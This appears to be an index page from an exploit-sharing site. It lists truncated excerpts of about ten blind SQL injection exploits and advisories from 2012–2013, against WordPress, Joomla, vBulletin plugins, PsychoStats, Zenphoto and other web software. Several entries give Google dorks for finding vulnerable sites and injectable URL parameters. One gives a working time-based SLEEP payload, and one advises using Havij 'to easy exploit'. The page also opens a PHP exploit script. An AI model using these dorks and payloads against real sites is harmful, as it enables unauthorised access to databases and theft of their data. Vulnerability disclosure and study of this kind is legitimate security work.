WordPress WP Realty Blind SQL Injection

28 October 2013 - Source: http://www.mondounix.com
$$$$$$\      $$\   $$\     $$$$$$\ 
$$  __$$\     $$ |  $$ |   $$  __$$\
$$ /  \__|    $$ |  $$ |   $$ /  \__|
$$ |$$$$\     $$$$$$$$ |   \$$$$$$\ 
$$ |\_$$ |    $$  __$$ |    \____$$\
$$ |  $$ |    $$ |  $$ |   $$\   $$ |
\$$$$$$  |$$\ $$ |  $$ |$$\\$$$$$$  |
 \______/ \__|\__|  \__|\__|\______/
 
# Exploit Title: Wordpress - wp-realty - MySQL Time Based Injection
# Google Dork: inurl:"/wp-content/plugins/wp-realty/"
# Vendor: http://wprealty.org/
# Date: 10/08/2013
# Exploit Author: Napsterakos
 
 
Link: http://localhost/wordpress/wp-content/plugins/wp-realty/
 
Exploit: http://localhost/wordpress/wp-content/plugins/wp-realty/index_ext.php?action=contact_friend&popup=yes&listing_id=[SQLi]
 
 
Credits...


mod_accounting 0.5 Blind SQL Injection

29 September 2013 - Source: http://www.mondounix.com
   - Affected Vendor: http://sourceforge.net/projects/mod-acct/files/
   - Affected Software: mod_accounting
   - Affected Version: 0.5. Other earlier versions may be affected.
   - Issue type: Blind SQL injection
   - Release Date: 20 Sep 2013
   - Discovered by: Eldar "Wireghoul" Marcussen
   - CVE Identifier: CVE-2013-5697
   - Issue status: Abandoned software, no patch available
 
Summary
 
mod_accounting is a traffic accounting module for Apache 1.3.x which
records traffic numbers in a database. Both MySQL and PostgreSQL database
types are supported. It supports arbitrary database designs as traffic
recording is performed via a user defined query in the Apache configuration
using placeholders for received...


Joomla JVideoClip Blind SQL Injection

24 September 2013 - Source: http://www.mondounix.com
================================================================================
Joomla Component com_jvideoclip (cid|uid|id) Blind SQL Injection / SQL Injection
================================================================================
 
Author          : SixP4ck3r
Email & msn     : SixP4ck3r@Bolivia.com
Date            : 21 Sept 2013
Critical Lvl    : Medium
Impact          : Exposure of sensitive information
Where           : From Remote
Blog            : http://sixp4ck3r.blogspot.com/
Credits         : To my love!
Dork            : inurl:com_jvideoclip
 
---------------------------------------------------------------------------
 
[Exploiting..Bug..Demo..]
 
http://example/index.php?option=com_jvideoclip&view=search&type=user&uid=[SQLi]&Itemid=6
 
[Blind...


PsychoStats 3.2.2b Blind SQL Injection

29 March 2013 - Source: http://www.mondounix.com
Exploit Title :  PsychoStats awards.php blind SQL Injection
==============
Date: 27/03/2013 00:50
=====
Author: Mohamed from ALG
======
Vendor or Software Link: http://psychostats.us/
=======================
Version: 3.2.2b
========
Category: webapps
=========
Google Keywords: "Powered by PsychoStats 3.2.2b"
===============
contact: senderberd[at]gmail.com
========
 
exploit:
========
 
http://server/awards.php?d=YYYY-MM-DD{Inject hier your blind SQL injection}
 
 
Use Havij to easy exploit
Enjoy
 
 
S.Th To a El Koyot
 
end
...


Rix4Web Portal Remote Blind SQL Injection

24 February 2013 - Source: http://www.mondounix.com
################################################
### Exploit Title: Rix4Web Portal Remote Blind SQL Injection Vulnerability
### Date: 02/23/2013 
### Author: L0n3ly-H34rT 
### Contact: l0n3ly_h34rt@hotmail.com 
### My Site: http://se3c.blogspot.com/ 
### Vendor Link: http://www.rix4web.com/
### Software Link: http://www.traidnt.net/vb/traidnt2230161/
### Tested on: Linux/Windows 
################################################
 
# AND time-based blind In POST:
 
POST http://127.0.0.1/rix/add-site.php?do=addnew&go=add
 
cat_id=1&dir_link=http://www.google.com/' AND SLEEP(5) AND 'test'='test&dir_short=1&dir_title=Mr.
 
# Just inject : dir_link
 
################################################
 
#...


Zenphoto 1.4.4.1 Blind SQL Injection

21 February 2013 - Source: http://www.mondounix.com
######################################################################################
#                                                                                    #
# Exploit Title : Zenphoto ver 1.4.4.1 Blind SQL Injection                           #
#                                                                                    #
# Author        : HosseinNsn                                                         #
#                                                                                    #
# Home          : http://Emperor-Team.Org                                            #
#                                                                                    #
# Software Link : http://www.zenphoto.org     ...


Paypal.com Blind SQL Injection

23 January 2013 - Source: http://www.mondounix.com
Title:
======
Paypal Bug Bounty #18 - Blind SQL Injection Vulnerability
 
 
Date:
=====
2013-01-22
 
 
References:
===========
http://www.vulnerability-lab.com/get_content.php?id=673
 
http://news.softpedia.com/news/PayPal-Addresses-Blind-SQL-Injection-Vulnerability-After-Being-Notified-by-Experts-323053.shtml
 
 
VL-ID:
=====
673
 
 
Common Vulnerability Scoring System:
====================================
8.3
 
 
Introduction:
=============
PayPal is a global e-commerce business allowing payments and money transfers to be made through the Internet. Online money 
transfers serve as electronic alternatives to paying with traditional paper methods, such as checks and money...


vBulletin 3.x / 4.x AjaxReg SQL Injection

10 December 2012 - Source: http://www.mondounix.com
#!/usr/bin/php
<?
 
# vBulletin 3.x/4.x AjaxReg remote Blind SQL Injection Exploit
# https://lh3.googleusercontent.com/-4HcW64E57CI/ULWN9mDnK8I/AAAAAAAAABo/cc0UA9eV_ak/s640/11-26-2012%25206-02-5s3%2520AM.png
# livedemo : http://www.youtube.com/watch?v=LlKaYyJxH7E
# check it : http://localhost/vBulletin/clientscript/register.js
 
function usage ()
{
    echo
        "\n[+] vBulletin 3.x/4.x AjaxReg remote Blind SQL Injection Exploit".
        "\n[+] Author: Cold z3ro".
        "\n[+] Site  : http://www.hackteach.org | http://www.s3curi7y.com".
        "\n[+] vandor: http://www.vbulletin.org/forum/showthread.php?t=144869".
        "\n[+] Usage : php 0day.php <hostname>...


Midwest Marketing (display_products.php) Blind SQL Vulnerability

12 November 2012 - Source: http://www.mondounix.com
#########################################################################
# Exploit Title: [ Midwest Marketing (display_products.php) Blind SQL Vulnerability ]                
# Date: [12-11-2012]                                                   
# Author: [ShinoBi-Dz]
# E-mail : ShinoBiDz442@gmail.com                                      
# Facebook : https://www.facebook.com/shinobi.DZz                     
# Category: [webapps]                                                   
# Google dork: "Designed by Midwest Marketing, LLC" inurl:display_products.php?id=
# Tested on: [Windows 7 ]                                              
#########################################################################
 
[~]Exploit/p0c...


netOffice Dwins 1.4p3 SQL Injection

12 November 2012 - Source: http://www.mondounix.com
:::::::-.   ...    ::::::.    :::.
  ;;,   `';, ;;     ;;;`;;;;,  `;;;
  `[[     [[[['     [[[  [[[[[. '[[
   $$,    $$$$      $$$  $$$ "Y$c$$
   888_,o8P'88    .d888  888    Y88
   MMMMP"`   "YmmMMMM""  MMM     YM
 
  [ Discovered by dun \ posdub[at]gmail.com ]
  [ 2012-11-08                              ]
#################################################################
#  [ netOffice Dwins <= 1.4p3 ]  SQL Injection Vulnerability    #
#################################################################
#
# Script: "netOffice Dwins is a free web based time tracking, timesheet,
#          content management, issue tracking, and project management environment."
#
# Vendor:   http://sourceforge.net/projects/netofficedwins/
#...
